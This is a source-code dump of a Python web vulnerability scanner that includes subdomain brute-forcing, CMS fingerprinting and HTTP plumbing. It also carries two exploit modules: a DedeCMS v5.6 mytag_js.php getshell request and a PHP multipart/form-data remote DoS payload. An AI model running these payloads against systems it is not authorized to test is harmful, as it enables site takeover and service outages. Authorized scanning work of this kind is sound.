NmapBackendPlugin.__init__(self) 22 | if dbname is not None: 23 | self.dbname = dbname 24 | if store is not None: 25 | self.store = store 26 | self.dbclient = MongoClient(**kwargs) 27 | self.collection = self.dbclient[self.dbname][self.store] 28 | 29 | def insert(self, report): 30 | """ 31 | create a json object from an NmapReport instance 32 | :param NmapReport: obj to insert 33 | :return: str id 34 | """ 35 | j = json.dumps(report, cls=ReportEncoder) 36 | try: 37 | oid = self.collection.insert(json.loads(j)) 38 | except: 39 | raise Exception("Failed to insert nmap object in MongoDB") 40 | return str(oid) 41 | 42 | def get(self, str_report_id=None): 43 | """ select a NmapReport by Id 44 | :param str: id 45 | :return: NmapReport object 46 | """ 47 | rid = str_report_id 48 | nmapreport = None 49 | if str_report_id is not None and isinstance(str_report_id, str): 50 | rid = ObjectId(str_report_id) 51 | 52 | if isinstance(rid, ObjectId): 53 | # get a specific report by mongo's id 54 | resultset = self.collection.find({'_id': rid}) 55 | if resultset.count() == 1: 56 | # search by id means only one in the iterator 57 | record = resultset[0] 58 | # remove mongo's id to recreate the NmapReport Obj 59 | del record['_id'] 60 | nmapreport = NmapParser.parse_fromdict(record) 61 | return nmapreport 62 | 63 | def getall(self, dict_filter=None): 64 | """return a list of tuple (id,NmapReport) saved in the backend 65 | TODO : add a filter capability 66 | """ 67 | nmapreportlist = [] 68 | resultset = self.collection.find() 69 | for report in resultset: 70 | oid = report['_id'] 71 | del report['_id'] 72 | nmapreport = NmapParser.parse_fromdict(report) 73 | nmapreportlist.append((oid, nmapreport)) 74 | return nmapreportlist 75 | 76 | def delete(self, report_id=None): 77 | """ 78 | delete an obj from the backend 79 | :param str: id 80 | :return: dict document with result or None 81 | """ 82 | if report_id is not None and isinstance(report_id, str): 83 | return self.collection.remove({'_id': ObjectId(report_id)}) 84 | else: 85 | return self.collection.remove({'_id': report_id}) 86 | -------------------------------------------------------------------------------- /teye_poc/php_multipart_dos.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | ''' 3 | php_multipart_dos.py 4 | ''' 5 | import sys 6 | from LogManager import log 7 | from teye_poc.PocScan import PocScan 8 | from misc.common import rand_letters 9 | from teye_web.http.URL import URL 10 | from wCurl import wcurl 11 | import time 12 | import datetime 13 | import socket 14 | import requests 15 | import httplib 16 | 17 | httplib.HTTPConnection.debuglevel = 0 18 | 19 | 20 | class php_multipart_dos(PocScan): 21 | def __init__(self): 22 | ''' 23 | ''' 24 | self._poc_info = { 25 | 'w_hat': { 26 | 'author': "imiyoo", 27 | 'blog': "http://www.imiyoo.com", 28 | 'team': "W.A.T", 29 | 'create_time': "2015-05-15" 30 | }, 31 | 'w_vul': { 32 | 'id': u"WID-2015-1002", 33 | 'title': u"PHP multipart/form-data 远程DOS漏洞", 34 | 'method': u"POST", 35 | 'tag': u"php", 36 | 'rank': u"高危", 37 | 'info': u"http://www.watscan.com/" 38 | } 39 | } 40 | self._linenum = 10 41 | self._data_type = ["normal", "payload"] 42 | 43 | def check(self, url): 44 | ''' 45 | ''' 46 | log.info(u"正在检测目标是否存在:[%s]..." % self.get_title()) 47 | url_domain = url.get_domain_url() 48 | a = self.get_res_time(url_domain, type="payload") 49 | b = self.get_res_time(url_domain, type="normal") 50 | c = self.get_res_time(url_domain, type="normal") 51 | print a, b, c 52 | if a > b and abs(a - b) > 2 * abs(b - c): 53 | # security_hole(domain) 54 | print url_domain 55 | 56 | def _gen_payload(self): 57 | ''' 58 | ''' 59 | payload = "" 60 | for i in xrange(self._linenum): 61 | payload += "a" * self._linenum + "\n" 62 | 63 | return payload 64 | 65 | def _gen_testdata(self, data): 66 | ''' 67 | ''' 68 | plen = len(data) 69 | return rand_letters(plen) 70 | 71 | def get_post_data(self, type="normal"): 72 | ''' 73 | ''' 74 | fuzzdata = self._gen_payload() 75 | testdata = self._gen_testdata(fuzzdata) 76 | postdata = "" 77 | postdata += "--5b4729970b854f95b01a01a2e799996f\r\n" 78 | if type == "normal": 79 | postdata += "Content-Disposition: form-data; name=\"filename\"; filename=\"test.txt\"\r\n\r\n" 80 | postdata += testdata + "just for a test!\r\n\r\n" 81 | else: 82 | postdata += "Content-Disposition: form-data; name=\"filename\"; filename=\"test.txt\"" + fuzzdata + "\r\n\r\n" 83 | postdata += "just for a test!\r\n\r\n" 84 | postdata += "--5b4729970b854f95b01a01a2e799996f--" 85 | print len(postdata) 86 | return postdata 87 | 88 | def get_res_time(self, url, type="normal"): 89 | headers = {"Content-Type": "multipart/form-data; boundary=5b4729970b854f95b01a01a2e799996f"} 90 | data = self.get_post_data(type) 91 | res = requests.post(url, headers=headers, data=data) 92 | return res.elapsed 93 | 94 | def get_class_name(self): 95 | return self.__class__.__name__ 96 | 97 | 98 | if __name__ == "__main__": 99 | if len(sys.argv) < 2: 100 | sys.exit() 101 | target = sys.argv[1] 102 | print "Scanning Target======>%s" % (target) 103 | urlobj = URL(target) 104 | p = php_multipart_dos() 105 | p.check(urlobj) 106 | -------------------------------------------------------------------------------- /teye_util/mysqlmanager.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | mysqlmanager.py 4 | ''' 5 | import rpyc 6 | import hashlib 7 | import datetime 8 | 9 | from LogManager import log 10 | from teye_data.config import cfg 11 | 12 | class mysqlmanager: 13 | 14 | ''' 15 | a class to manager the action between the program and the mysql 16 | 17 | according to rpyc report the information to the database 18 | 19 | ''' 20 | 21 | def __init__(self): 22 | 23 | self._client = None 24 | 25 | self._host =None 26 | 27 | self._port =None 28 | 29 | def _init(self): 30 | 31 | self._taskid =int(cfg.getData('taskid')) 32 | self._website =cfg.getData("target").get_host() 33 | 34 | self._host =cfg.getData('RPC_SERVER_IP') 35 | self._port =int(cfg.getData('RPC_SERVER_PORT')) 36 | 37 | try: 38 | self._client=rpyc.connect(self._host,self._port) 39 | self._client.root.open() 40 | 41 | except Exception,e: 42 | log.error(str(e)) 43 | 44 | def md5hex(self,str): 45 | ''' 46 | ''' 47 | m = hashlib.md5() 48 | m.update(str) 49 | return m.hexdigest() 50 | 51 | #exposed_client_update_percent(self,taskid,progress): 52 | def t_update_percent(self,progress): 53 | ''' 54 | ''' 55 | try: 56 | self._client.root.client_update_progress(self._taskid,progress) 57 | except Exception,e: 58 | log.error(str(e)) 59 | 60 | #exposed_client_update_starttime(self,taskid,starttime): 61 | def wat_update_starttime(self,starttime): 62 | ''' 63 | ''' 64 | try: 65 | self._client.root.client_update_starttime(self._taskid,starttime) 66 | except Exception,e: 67 | log.error(str(e)) 68 | 69 | #exposed_client_update_finishtime(self,taskid,finishtime): 70 | def wat_update_finishtime(self,finishtime): 71 | ''' 72 | ''' 73 | try: 74 | self._client.root.client_update_finishtime(self._taskid,finishtime) 75 | except Exception,e: 76 | log.error(str(e)) 77 | 78 | #exposed_client_insert_brute 79 | def wat_report_bruteurl(self,bruteurl): 80 | ''' 81 | ''' 82 | try: 83 | self._client.root.client_insert_bruteurl(self._taskid,self._domain,bruteurl) 84 | except Exception,e: 85 | om.out.error(str(e)) 86 | 87 | def t_task_exist(self): 88 | ''' 89 | ''' 90 | result = None 91 | try: 92 | result = self._client.root.client_task_exist(self._taskid) 93 | except Exception,e: 94 | log.error(str(e)) 95 | 96 | return result 97 | 98 | #exposed_client_insert_reports(self,taskid,website,high,middle,low,notice) 99 | def t_report_vuln(self,result,high_count,middle_count,low_count,notice_count): 100 | ''' 101 | ''' 102 | if self.t_task_exist(): 103 | try: 104 | self._client.root.client_update_reports(self._taskid,result,high_count,middle_count,low_count,notice_count) 105 | except Exception,e: 106 | log.error(str(e)) 107 | else: 108 | 109 | try: 110 | self._client.root.client_insert_reports(self._taskid,self._website,result,high_count,middle_count,low_count,notice_count) 111 | except Exception,e: 112 | log.error(str(e)) 113 | 114 | 115 | def close(self): 116 | 117 | if self._client: 118 | self._client.close() 119 | else: 120 | return True 121 | 122 | 123 | mm = mysqlmanager() 124 | -------------------------------------------------------------------------------- /teye_web/parser/lru.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | LRU.py 4 | ''' 5 | from __future__ import with_statement 6 | 7 | import threading 8 | 9 | class Node(object): 10 | __slots__ = ['prev', 'next', 'me'] 11 | def __init__(self, prev, me): 12 | self.prev = prev 13 | self.me = me 14 | self.next = None 15 | 16 | class LRU: 17 | """ 18 | Implementation of a length-limited O(1) LRU queue. 19 | Built for and used by PyPE: 20 | http://pype.sourceforge.net 21 | Copyright 2003 Josiah Carlson. 22 | 23 | These is a list of the modifications that I (Andres Riancho) introduced to the code: 24 | - Thread safety 25 | 26 | >>> lru_test = LRU(4) 27 | >>> lru_test['1'] = 1 28 | >>> lru_test['2'] = 1 29 | >>> lru_test['3'] = 1 30 | >>> lru_test['4'] = 1 31 | 32 | # Adding one more, the '1' should go away 33 | >>> lru_test['5'] = 1 34 | >>> '1' in lru_test 35 | False 36 | >>> '5' in lru_test 37 | True 38 | """ 39 | def __init__(self, count, pairs=[]): 40 | self.lock = threading.RLock() 41 | self.count = max(count, 1) 42 | self.d = {} 43 | self.first = None 44 | self.last = None 45 | for key, value in pairs: 46 | self[key] = value 47 | 48 | def __contains__(self, obj): 49 | return obj in self.d 50 | 51 | def __getitem__(self, obj): 52 | with self.lock: 53 | item = self.d[obj].me 54 | self[item[0]] = item[1] 55 | return item[1] 56 | 57 | def __setitem__(self, obj, val): 58 | with self.lock: 59 | if obj in self.d: 60 | del self[obj] 61 | nobj = Node(self.last, (obj, val)) 62 | if self.first is None: 63 | self.first = nobj 64 | if self.last: 65 | self.last.next = nobj 66 | self.last = nobj 67 | self.d[obj] = nobj 68 | if len(self.d) > self.count: 69 | if self.first == self.last: 70 | self.first = None 71 | self.last = None 72 | return 73 | item = self.first 74 | item.next.prev = None 75 | self.first = item.next 76 | item.next = None 77 | del self.d[item.me[0]] 78 | del item 79 | 80 | def __delitem__(self, obj): 81 | with self.lock: 82 | nobj = self.d[obj] 83 | if nobj.prev: 84 | nobj.prev.next = nobj.next 85 | else: 86 | self.first = nobj.next 87 | if nobj.next: 88 | nobj.next.prev = nobj.prev 89 | else: 90 | self.last = nobj.prev 91 | del self.d[obj] 92 | 93 | def __iter__(self): 94 | cur = self.first 95 | while cur is not None: 96 | cur2 = cur.next 97 | yield cur.me[1] 98 | cur = cur2 99 | 100 | def iteritems(self): 101 | cur = self.first 102 | while cur is not None: 103 | cur2 = cur.next 104 | yield cur.me 105 | cur = cur2 106 | 107 | def iterkeys(self): 108 | return iter(self.d) 109 | 110 | def itervalues(self): 111 | for i, j in self.iteritems(): 112 | yield j 113 | 114 | def keys(self): 115 | return self.d.keys() 116 | 117 | def __len__(self): 118 | return len(self.d) 119 | 120 | def values(self): 121 | return [i.me[1] for i in self.d.values()] 122 | 123 | -------------------------------------------------------------------------------- /teye_poc/dedecms_mytag_getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | import sys 5 | 6 | sys.path.append("/Users/imiyoo/workplace/tscanner/") 7 | 8 | import re 9 | import time 10 | from misc.common import md5 11 | from teye_web.http.URL import URL 12 | from teye_web.util.error_sql import get_error_sql_key 13 | 14 | # urllib2,requests,httplib2 15 | from wCurl import wcurl 16 | 17 | from teye_poc.PocScan import PocScan 18 | from LogManager import log 19 | 20 | import httplib 21 | 22 | httplib.HTTPConnection.debuglevel = 1 23 | 24 | from teye_data.vulnmanager import vm 25 | 26 | 27 | class dedecms_mytag_getshell(PocScan): 28 | ''' 29 | ''' 30 | 31 | def __init__(self): 32 | ''' 33 | ''' 34 | self._poc_info = { 35 | 36 | 'w_hat': { 37 | 'author': "imiyoo", 38 | 'blog': "http://www.imiyoo.com", 39 | 'team': "W.A.T", 40 | 'create_time': "2011-08-25" 41 | }, 42 | 'w_vul': { 43 | 'id': u"WID-2011-1032", 44 | 'title': u"Dedecms v5.6 mytag_js.php getshell漏洞", 45 | 'method': u"GET", 46 | 'tag': u"dedecms", 47 | 'rank': u"高危", 48 | 'info': u"http://www.watscan.com/" 49 | } 50 | } 51 | 52 | self._db_info = ('127.0.0.1', 'root', 'root', 'book', 'dede_') 53 | self._file_key = "plus/" + md5("wat2018") + ".php" 54 | self._data_key = md5("wattest") 55 | self._vuln_file = "plus/mytag_js.php" 56 | 57 | # 扫描模式:0为域名模式检测,1为路径模式检测(检测用户输入的URL路径) 58 | self._scan_mode = 1 59 | 60 | def check(self, url): 61 | ''' 62 | ''' 63 | log.info(u"正在检测目标是否存在:[%s]..." % self.get_title()) 64 | if not self._scan_mode: 65 | domain_path = url.get_domain_path() 66 | exp_url = domain_path.urljoin(self._vuln_file) 67 | chk_url = domain_path.urljoin(self._file_key) 68 | else: 69 | exp_url = url.urljoin(self._vuln_file) 70 | print exp_url 71 | chk_url = url.urljoin(self._file_key) 72 | 73 | data = "aid=1&cfg_dbhost=%s&cfg_dbuser=%s&cfg_dbpwd=%s&cfg_dbname=%s&cfg_dbprefix=%s" % self._db_info 74 | wcurl.get(exp_url, params=data) 75 | 76 | time.sleep(1) 77 | 78 | chk_res = wcurl.get(chk_url) 79 | if self._find_vuln(chk_res, self._data_key): 80 | print "test" 81 | self.security_hole(exp_url) 82 | 83 | def _find_vuln(self, res, key): 84 | ''' 85 | ''' 86 | body = res.body 87 | print key 88 | print body 89 | if body is None: 90 | return False 91 | 92 | if body.find(key) > -1: 93 | return True 94 | else: 95 | return False 96 | 97 | def get_name(self): 98 | ''' 99 | ''' 100 | return self.__class__.__name__ 101 | 102 | 103 | if __name__ == "__main__": 104 | from optparse import OptionParser 105 | 106 | usage = "usage: %prog [options] arg" 107 | parser = OptionParser(usage) 108 | parser.add_option("-u", "--url", action="store", dest="url", default=None, help="Scan the target url") 109 | (options, args) = parser.parse_args() 110 | if not options.url: 111 | parser.print_help() 112 | sys.exit(-1) 113 | else: 114 | url = options.url 115 | target_url = URL(url) 116 | check_inst = dedecms_mytag_getshell() 117 | check_inst.check(target_url) 118 | print vm.get_all_vuln() 119 | -------------------------------------------------------------------------------- /teye_domain/DomainScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | DomainScan.py 4 | ''' 5 | import os 6 | import sys 7 | 8 | #加载配置文件 9 | sys.path.append("..") 10 | import teye_config as Settings 11 | 12 | import re 13 | import time 14 | import urllib2 15 | import dns.resolver 16 | import dns.rdatatype 17 | from LogManager import log 18 | 19 | class DomainScan: 20 | ''' 21 | ''' 22 | MAX_WILD_RECORDS = 8 23 | 24 | def __init__(self,domain_file=None): 25 | ''' 26 | ''' 27 | self._ip_list = [] 28 | 29 | self._subdomain_list = [] 30 | 31 | self._subdomain_file = domain_file if domain_file else Settings.DOMAIN_FILE 32 | 33 | self._black_list = ['127.0.0.1'] 34 | 35 | self._resolver = dns.resolver.Resolver() 36 | #百度DNS:180.76.76.76 37 | #阿里DNS:223.5.5.5,223.6.6.6 38 | self._resolver.nameservers=['180.76.76.76','223.5.5.5','223.6.6.6'] 39 | 40 | def _load_domain(self): 41 | ''' 42 | ''' 43 | sub_list = [] 44 | with open(self._subdomain_file) as f: 45 | for line in f: 46 | sub = line.strip() 47 | if sub.startswith("#"): 48 | continue 49 | sub_list.append(sub) 50 | 51 | return sub_list 52 | 53 | def domain_scan(self,root_domain): 54 | ''' 55 | ''' 56 | sublist = self._load_domain() 57 | 58 | for item in sublist: 59 | subdomain = item + "." + root_domain 60 | log.info("DomainScan Scanning:" + subdomain) 61 | 62 | try: 63 | resp = self._resolver.query(subdomain) 64 | is_wild_record = False 65 | if resp: 66 | is_local_ip = False 67 | for item in resp: 68 | wild_record = {} 69 | ipaddr = item.address 70 | 71 | if ipaddr in self._black_list: 72 | is_local_ip = True 73 | break 74 | 75 | if ipaddr not in self._ip_list: 76 | wild_record[ipaddr] = 1 77 | self._ip_list.append(ipaddr) 78 | else: 79 | wild_record[ipaddr] +=1 80 | if wild_record[ipaddr]>DomainScan.MAX_WILD_RECORDS: 81 | is_wild_record = True 82 | 83 | if is_wild_record: 84 | log.info("DomainScan Found Wild Record") 85 | break 86 | 87 | if subdomain not in self._subdomain_list and not is_local_ip: 88 | self._subdomain_list.append(subdomain) 89 | 90 | except Exception as e: 91 | #print str(e) 92 | continue 93 | 94 | return self._subdomain_list 95 | 96 | def get_ip_list(self): 97 | ''' 98 | ''' 99 | return self._ip_list 100 | 101 | 102 | def get_subdomain_date(subdomain): 103 | ''' 104 | ''' 105 | api_url = "http://toolbar.netcraft.com/site_report?url=%s" 106 | 107 | req_url = api_url % subdomain 108 | 109 | res_body = "" 110 | 111 | try: 112 | res = urllib2.urlopen(req_url) 113 | 114 | res_body = res.read() 115 | except: 116 | return "None" 117 | 118 | reg = re.compile("date\s+first\s+seen</th>(.*?)</td>",re.S|re.IGNORECASE) 119 | result = reg.search(res_body) 120 | 121 | if result is not None: 122 | t1 = result.group() 123 | else: 124 | return "None" 125 | 126 | if t1 is not None: 127 | if t1.find(">")>-1: 128 | t2 = t1.split(">") 129 | if len(t2)>3: 130 | if t2[2].find("unavailable")>-1: 131 | return "None" 132 | else: 133 | return t2[2].replace("</td","") 134 | else: 135 | return "None" 136 | else: 137 | return "None" 138 | 139 | 140 | if __name__=="__main__": 141 | ''' 142 | ''' 143 | if len(sys.argv)<2: 144 | print "Plz Input Root Domain!" 145 | sys.exit() 146 | 147 | domain = sys.argv[1] 148 | 149 | print domain 150 | 151 | filename = "domain_name.list" 152 | 153 | ds = DomainScan(filename) 154 | 155 | start_time = time.time() 156 | subdomain_list = ds.domain_scan(domain) 157 | end_time = time.time() 158 | print "Elapsed:"+str(end_time-start_time) 159 | print len(subdomain_list) 160 | 161 | for item in subdomain_list: 162 | s = item.strip() 163 | t = get_subdomain_date(s) 164 | print "%s----First Seen:%s" % (s,t) 165 | 166 | -------------------------------------------------------------------------------- /teye.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | 4 | import os 5 | import sys 6 | from teye_util.banner import scan_banner 7 | import teye_config as Settings 8 | 9 | import optparse 10 | import json 11 | import datetime 12 | from teye_web.http.URL import URL 13 | from teye_web.http.cookie import cookie 14 | from teye_data.config import cfg 15 | from teye_data.info import db_info 16 | 17 | from teye_data.vulnmanager import vm 18 | 19 | 20 | def parseargs(): 21 | ''' 22 | ''' 23 | parser = optparse.OptionParser(usage="%prog [OPTIONS]\n\n" \ 24 | "example:%prog -s \"http://testphp.vulnweb.com/\" -p '{\"useragent\":\"TScanner/1.0\",\"type\":2,\"cookie\":\"\"}' -t 100000") 25 | 26 | parser.add_option("-s","--URL",action="store",dest="url", \ 27 | help="scan target,scan the url", \ 28 | default="http://www.gudwine.com") 29 | 30 | parser.add_option("-p","--Profile",action="store",dest="profile", \ 31 | help="scan profile,config the task") 32 | 33 | parser.add_option("-t","--Taskid",action="store",dest="taskid", \ 34 | help="scan taskid,remote database index", \ 35 | default="100000") 36 | 37 | parser.add_option("-m","--Mode",action="store",dest="mode", \ 38 | help="scan mode,teye or tweb", \ 39 | default="tweb") 40 | 41 | if len(sys.argv)==1: 42 | parser.print_help() 43 | sys.exit(-1) 44 | 45 | options,args = parser.parse_args() 46 | 47 | 48 | return options 49 | 50 | 51 | def scan_config(): 52 | ''' 53 | ''' 54 | scan_banner() 55 | options = parseargs() 56 | 57 | cfg.save("target",URL(options.url)) 58 | cfg.save("profile",options.profile) 59 | cfg.save("taskid",int(options.taskid)) 60 | cfg.save("mode",options.mode) 61 | 62 | #rpc server configure 63 | cfg.save("RPC_SERVER_IP","123.57.242.231") 64 | if cfg["mode"].lower()=="tweb": 65 | cfg.save("RPC_SERVER_PORT",9999) 66 | else: 67 | cfg.save("RPC_SERVER_PORT",8888) 68 | 69 | if cfg["taskid"]>100000: 70 | cfg["remote_mysql"]=True 71 | else: 72 | cfg["remote_mysql"]=False 73 | 74 | #profile config 75 | cfg["domain_scan"]=False 76 | t_profile = cfg.get("profile") 77 | 78 | if t_profile is not None: 79 | #type,rate,useragent,proxy,cookie 80 | set_profile = json.loads(t_profile) 81 | if int(set_profile.get("type"))==2: 82 | cfg["domain_scan"]=True 83 | cfg["max_domain_scan"]=20 84 | 85 | if set_profile.get("useragent"): 86 | cfg["scan_signature"] = set_profile.get("useragent") 87 | else: 88 | cfg["scan_signature"] = "TScanner/1.0" 89 | 90 | cfg["scan_cookies"] = cookie(set_profile.get("cookie")) 91 | cfg["scan_proxies"] = {'http':set_profile.get("pxory")} 92 | 93 | else: 94 | cfg["scan_signature"] = "TScanner/1.0" 95 | cfg["scan_cookies"] = {} 96 | cfg["scan_proxies"] = {} 97 | 98 | l_profile={} 99 | l_profile["useragent"] =cfg["scan_signature"] 100 | l_profile["cookie"] =cfg["scan_cookies"] 101 | l_profile["proxies"] =cfg["scan_proxies"] 102 | 103 | db_info.set_profile(l_profile) 104 | 105 | 106 | if __name__=="__main__": 107 | ''' 108 | ''' 109 | scan_config() 110 | 111 | from teye_core.tcore import tCore 112 | scan_engine = tCore() 113 | 114 | try: 115 | scan_engine.scan_site(cfg.get("target")) 116 | 117 | except Exception,e: 118 | print str(e) 119 | db_info.set_end_time(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) 120 | 121 | finally: 122 | scan_engine.store_vuln() 123 | filename = cfg.get("target").get_host()+".html" 124 | scan_engine.generate_report(filename) 125 | scan_engine.end() -------------------------------------------------------------------------------- /teye_finger/FingerScan.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | FingerScan.py 4 | ''' 5 | 6 | import os 7 | import sys 8 | 9 | #加载配置文件 10 | sys.path.append("..") 11 | import teye_config as Settings 12 | 13 | import re 14 | import json 15 | import hashlib 16 | 17 | from wCurl import wcurl 18 | from LogManager import log 19 | 20 | from teye_web.http.URL import URL 21 | 22 | 23 | class FingerScan: 24 | ''' 25 | ''' 26 | def __init__(self): 27 | ''' 28 | ''' 29 | self._app_file = Settings.FINGER_FILE 30 | #指纹扫描模式:0为根域名扫描;1为自定义路径扫描模式 31 | self._scan_mode=0 32 | 33 | self._app_db = open(self._app_file,"rb").readlines() 34 | 35 | self._server_finger = None 36 | 37 | self._http_code = None 38 | 39 | def md5(self,content): 40 | ''' 41 | ''' 42 | if isinstance(content,unicode): 43 | content = content.encode("utf-8") 44 | else: 45 | content = content 46 | 47 | m = hashlib.md5() 48 | 49 | try: 50 | m.update(content) 51 | return m.hexdigest() 52 | except: 53 | return None 54 | 55 | def set_mode(self,mode): 56 | ''' 57 | ''' 58 | self._scan_mode = mode 59 | #{"wordpress":{"url":"/wp-admin.php","header":("server":"WAF/2.0"),"md5":"aaaaaaaaaaa"}} 60 | def scan_finger(self,site): 61 | ''' 62 | ''' 63 | app_name_list = [] 64 | for item in self._app_db: 65 | if item.startswith("#"): 66 | continue 67 | dict_item =json.loads(item.strip()) 68 | app_name = "".join(dict_item.keys()).strip() 69 | app_info = dict_item.get(app_name) 70 | url = app_info.get("url") 71 | 72 | urlobj = URL(site) 73 | if self._scan_mode==1: 74 | test_url = urlobj.get_uri_string() 75 | if test_url.endswith("/"): 76 | target_url = test_url[0:-1] + url 77 | else: 78 | target_url = test_url + url 79 | 80 | else: 81 | test_url = urlobj.get_netloc() 82 | target_url = urlobj.get_scheme()+"://"+test_url+ url 83 | 84 | log.info(target_url) 85 | try: 86 | res = wcurl.get(target_url) 87 | except: 88 | continue 89 | 90 | dst_headers = res.headers 91 | dst_body = res.body 92 | 93 | self._http_code = res.get_code() 94 | 95 | try: 96 | self._server_finger = dst_headers["server"] 97 | except: 98 | pass 99 | 100 | if dst_body is None: 101 | continue 102 | 103 | md5_body = self.md5(dst_body) 104 | 105 | key_list = app_info.keys() 106 | 107 | if "headers" in key_list: 108 | app_headers = app_info.get("headers") 109 | app_key = app_headers[0].lower() 110 | app_value = app_headers[1] 111 | 112 | if app_key in dst_headers.keys(): 113 | dst_info = dst_headers.get(app_key) 114 | result = re.search(app_value,dst_info,re.I) 115 | if result: 116 | if "body" in key_list: 117 | app_body = app_info.get("body") 118 | result = re.search(app_body,dst_body,re.I) 119 | if result: 120 | app_name_list.append((target_url,app_name)) 121 | else: 122 | app_name_list.append((target_url,app_name)) 123 | 124 | elif "body" in key_list: 125 | app_body = app_info.get("body") 126 | result = re.search(app_body,dst_body,re.I) 127 | if result: 128 | app_name_list.append((target_url,app_name)) 129 | 130 | elif "md5" in key_list: 131 | app_md5 = app_info.get("md5") 132 | if app_md5 == md5_body: 133 | app_name_list.append((target_url,app_name)) 134 | 135 | return app_name_list 136 | 137 | def get_server(self): 138 | ''' 139 | ''' 140 | return self._server_finger 141 | 142 | 143 | def get_code(self): 144 | ''' 145 | ''' 146 | return self._http_code 147 | 148 | if __name__=="__main__": 149 | ''' 150 | ''' 151 | if len(sys.argv)<2: 152 | print "Plz Input Site" 153 | sys.exit() 154 | 155 | fs = FingerScan() 156 | print sys.argv[1] 157 | test=fs.scan_finger(sys.argv[1]) 158 | print test 159 | for item in test: 160 | print item 161 | print fs.get_server() 162 | -------------------------------------------------------------------------------- /teye_web/http/Request.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | Request.py 4 | ''' 5 | import os 6 | import sys 7 | 8 | import uuid 9 | import copy 10 | from URL import URL 11 | 12 | from teye_data.config import cfg 13 | 14 | class Request(object): 15 | ''' 16 | ''' 17 | #Default user agent string 18 | DEFAULT_USER_AGENT = cfg["scan_signature"] if cfg.has_key("scan_signature") else "TScanner/1.0" 19 | 20 | def __init__(self,url,method='GET',headers=None,cookies=None,referer=None,data=None,user_agent=DEFAULT_USER_AGENT,**kwargs): 21 | ''' 22 | ''' 23 | if isinstance(url,URL): 24 | self._url = url 25 | else: 26 | self._url = URL(url) 27 | 28 | self._method = method 29 | 30 | self.id = uuid.uuid1() 31 | 32 | self._headers = {} 33 | if headers: 34 | self._headers.update(headers) 35 | 36 | self._cookies = cookies 37 | 38 | self._referer = referer 39 | 40 | self._user_agent = user_agent 41 | 42 | if self._cookies: 43 | self._headers.update({"Cookie": self._cookies}) 44 | 45 | if self._referer: 46 | self._headers.update({"Referer": self._referer}) 47 | 48 | if self._user_agent: 49 | self._headers.update({"User-Agent": self._user_agent}) 50 | 51 | 52 | self._get_data = self._url.get_querystring() 53 | 54 | self._post_data = data if data else "" 55 | 56 | def get_get_param(self): 57 | ''' 58 | ''' 59 | return self._get_data 60 | 61 | def get_post_param(self): 62 | ''' 63 | ''' 64 | return self._post_data 65 | 66 | def get_url(self): 67 | ''' 68 | ''' 69 | return self._url 70 | 71 | def get_method(self): 72 | ''' 73 | ''' 74 | return self._method 75 | 76 | def get_id(self): 77 | ''' 78 | ''' 79 | return self.id 80 | 81 | def get_headers(self): 82 | ''' 83 | ''' 84 | return self._headers 85 | 86 | def get_cookies(self): 87 | ''' 88 | ''' 89 | return self._cookies 90 | 91 | def set_method(self,method): 92 | ''' 93 | ''' 94 | self._method = method.upper() 95 | 96 | def set_post_data(self,postdata): 97 | ''' 98 | ''' 99 | self._post_data = postdata 100 | 101 | def set_get_data(self,getdata): 102 | ''' 103 | ''' 104 | self._get_data = getdata 105 | 106 | def set_referer(self,referer): 107 | ''' 108 | ''' 109 | self._referer = referer 110 | 111 | def set_cookies(self,cookies): 112 | ''' 113 | ''' 114 | self._cookies = cookies 115 | 116 | def __eq__(self, other): 117 | ''' 118 | ''' 119 | if self._url == other._url and self._method == other._method: 120 | return True 121 | else: 122 | return False 123 | 124 | def __str__(self): 125 | ''' 126 | ''' 127 | result_string = self._method 128 | 129 | result_string +=" "+self._url.url_string + " HTTP/1.1\r\n" 130 | 131 | headers = copy.deepcopy(self._headers) 132 | headers.update({"Host":self._url.get_host()}) 133 | 134 | for key,value in headers.iteritems(): 135 | result_string +=key+": "+value 136 | result_string +="\r\n" 137 | 138 | result_string +="\r\n" 139 | 140 | if self._method=="POST": 141 | result_string +=str(self._post_data) 142 | 143 | result_string = result_string.encode("utf-8") 144 | 145 | return result_string 146 | 147 | def __repr__(self): 148 | ''' 149 | ''' 150 | vals = {'method':self.get_method(),'url':self.get_url().url_string,'id':self.get_id()} 151 | 152 | return '<Request | %(method)s | %(url)s | %(id)s>' % vals 153 | 154 | if __name__=="__main__": 155 | ''' 156 | ''' 157 | req = Request("http://www.baidu.com/index.php?id=1") 158 | print req.get_get_param() 159 | print req.get_url() 160 | print req 161 | 162 | a = [] 163 | a.append(req) 164 | print a 165 | -------------------------------------------------------------------------------- /wCurl.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | wCurl.py 4 | ''' 5 | import time 6 | import socket 7 | import httplib 8 | import requests 9 | requests.packages.urllib3.disable_warnings() 10 | 11 | from teye_data.config import cfg 12 | from teye_web.http.URL import URL 13 | from teye_web.http.Request import Request 14 | from teye_web.http.Response import Response,from_requests_response 15 | 16 | timeout = 60 17 | socket.setdefaulttimeout(timeout) 18 | 19 | DEBUGSWITCH = 0 #0关闭调试,1开启调试 20 | 21 | class wCurl: 22 | ''' 23 | ''' 24 | def __init__(self): 25 | ''' 26 | ''' 27 | self._time = 0.0 28 | self._speed = 20 29 | self._conn = 0 30 | self._hook_manager() 31 | 32 | self._scan_signature = cfg["scan_signature"] if cfg.has_key("scan_signature") else "TScanner/1.0" 33 | self._scan_cookies = cfg["scan_cookies"] if cfg.has_key("scan_cookies") else {} 34 | self._scan_proxies = cfg["scan_proxies"] if cfg.has_key("scan_proxies") else {} 35 | 36 | httplib.HTTPConnection.debuglevel = DEBUGSWITCH 37 | 38 | def _hook_manager(self): 39 | ''' 40 | ''' 41 | _connect = socket.socket.connect 42 | 43 | socket.socket.connect = lambda *args,**kwargs :apply(self._hook_connect,(_connect,self,args,kwargs)) 44 | 45 | def _hook_connect(self,*args,**kwargs): 46 | ''' 47 | ''' 48 | 